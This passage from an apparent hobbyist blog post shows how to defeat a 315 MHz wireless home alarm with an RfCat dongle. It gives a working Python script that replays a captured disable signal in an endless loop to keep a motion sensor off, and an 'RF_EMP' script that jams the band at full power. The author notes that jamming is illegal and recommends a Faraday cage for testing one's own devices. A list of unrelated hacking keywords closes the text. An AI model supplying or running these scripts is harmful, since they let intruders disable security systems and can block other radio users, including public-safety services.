
\xA2\xA2\x88\xA2\x8A\x28\xA8\xA2\x8A\x28

Testing / Troubleshooting: 

I first tried sending only the repeating sequence under the assumption the opening sequence was a fluke but that did not work. 

I then tried sending only the opening sequence and that didn't work either.  

I combined the first part with a repeating 2nd part for 10 iterations 

The alert light immediately turned off on the device when testing from an alerting state, and from all states stopped alerting completely

Note(My light no longer turns off, I think I broke it or something LOL, or my setup at the time was different to current testing) 

In order to send the first part and the second part we need to send it so that we have padding between each sequence and in a way that only the second part repeats, we can do that the following way: 

d.RFxmit("\x88\xa2\x8a\x28\xa8\x8a\x28\xa0\x00\x00\x00\x00\x00\x00" + "\xA2\xA2\x88\xA2\x8A\x28\xA8\xA2\x8A\x28\x00\x00\x00\x00\x00\x00"*40)

The above is very simple, to explain:

• First add in your opening patterns HEX values
• Pad that with 6 \x00 for spacing
• Add the second patterns HEX values and add that with 6 \x00
• Now multiply the second part by 10 since in the wave output this part was repeating

Below is the full code to do this, it is the same as the doorbell code with the new line from above and a While 1 loop that never stops so that the device is fully disabled using its own functionality against it :)  

SUCCESS

As a quick test if you intentionally trip the sensor and immediately send this code the BEEP BEEP BEEP will be cut short to a single BEEP also the light may turn off depending how its configured. In all cases the motion sensor capability will be disabled. If you turn this script on at any time the sensor is completely disabled until you stop your transmission:

#--------Disable The Motion Sensor --------#: 

from rflib import *

d = RfCat()

d.setFreq(315005000)

d.setMdmModulation(MOD_ASK_OOK)

d.setMdmDRate(4800)

while 1:  #Added a loop to keep the sensor disabled

print ("Starting Transmission")

d.RFxmit("\x88\xa2\x8a\x28\xa8\x8a\x28\xa0\x00\x00\x00\x00\x00\x00" + "\xA2\xA2\x88\xA2\x8A\x28\xA8\xA2\x8A\x28\x00\x00\x00\x00\x00\x00"*40)

print ("Transmission Complete")

#--------End Code --------#

Jamming RF With Python: 

Bypassing the sensors worked, but then I got thinking, so what if the company puts out a new patch and I am no longer able to turn off the sensors by using the devices functionality against itself? Or what if I wanted to bypass the door alert when the door is opened and it breaks the connection?  The door alert does not have a disable signal sent back to the receiver, it always alerts when separated. 

RF Jamming and the FCC: 

One way we can do this is with RF Jamming attacks. However, it should be noted that Jamming is technically ILLEGAL in the US on all frequencies. So in order to test this in a Legal way you will need a walk in Faraday cage to place your equipment and do some testing. This way you will not interfere with the operation of other devices on the frequency that you are jamming. 

From the FCC: https://apps.fcc.gov/edocs_public/attachmatch/DA-12-1642A1.pdf

"We caution consumers that it is against the law to use a cell or GPS jammer or any other type of device that blocks, jams or interferes with authorized communications, as well as to import, advertise, sell, or ship such a device. The FCC Enforcement Bureau has a zero tolerance policy in this area and will take aggressive action against violators. "

Notes On the reality of Criminals: 

It should also be noted that if a criminal is trying to break into your house or a building protected by an alert system that uses wireless technologies, he is probably not following FCC guidelines. So assume if you can attack your alarm system in the safety of a Faraday cage.  Your alarm system is vulnerable to attack by any criminal. A fair assumption when penetration testing an alarm system your considering for install.  You may want devices which are hardwired in as a backup. 

There has always been Jammers for things like Cellphones, WiFi networks. With the introduction of affordable software defined radio devices an attacker can jam the 315 frequency to disable your alert system as a viable attack.  A simple python script can kill a device in the 315 range and make it in-operable. 

Jamming in Python: 

I found the below script to be 100% effective while testing within a Faraday enclosure. Basically  the device pauses in its current operational state, idle state or a alert light state, the device will remain in that state indefinitely until the jamming attack is stopped and the devices are manually reset.

Use a Faraday cage for your security testing: 

If you use the below code make sure you use precautions such as Faraday cages to ensure the legal guidelines are met and you are not interfering with other devices in your area. You must assume that radios used by police, fire departments and other public safety activities could be blocked if you are not enclosing your signal. This code is purely for you to test your devices before installing them for the security of your assets. 

I call the below program RF_EMP,  not because its sending an electronic pulse but because similar to an EMP its disabling all devices in its range.  Which is why you need to use a Faraday cage so as not to interfere with devices you do not own. 

Below is a simple manually configurable version of this script. 

#--------RF_Emp.py Simple Version --------#: 

# For use within Faraday Enclosures only

from rflib import *

print "Start RF Jamming FTW"

d = RfCat()

d.setMdmModulation(MOD_ASK_OOK)

d.setFreq(315000000)

d.setMdmSyncMode(0)

d.setMdmDRate(4800)

d.setMdmChanSpc(24000)

d.setModeIDLE()

d.setPower(100)

d.makePktFLEN(0)

print "Starting JAM Session,  Make sure your in your Faraday Enclosure..."

d.setModeTX() # start transmitting

raw_input("Unplug to stop jamming")

print 'done'

d.setModeIDLE() # This puts the YardStick in idle mode to stop jamming (Not convinced this works)

#--------End Code --------#

Notes on using Virtual Machines: 

You can do your RF testing on a virtual machine with pre-installed tools but its kind of sketchy and you might want to throw your Yardstick against the wall in a fury of anger when you have to unplug it after every transmission. After a few fits of blind rage I decided to install it natively so my tools work every time without removing the dongle after each transmission. 

Whats next: 

This is it for the first blog..  Other topics  will be discussed later, such as attacking devices in a blackbox assessment and configuring your own key fobs. Rolling code devices and bypassing their protections. Monitoring and attacking car components. If you have anything to add or would like to help out.. Feel free to comment and add to the discussion. 

Related word

1. Hacking Ético Con Herramientas Python Pdf
2. Growth Hacking Pdf
3. Hacking Health
4. Hacking Growth
5. Hacking Basico
6. Ethical Hacking Curso
7. Computer Hacking
8. Hacking Tor Whatsapp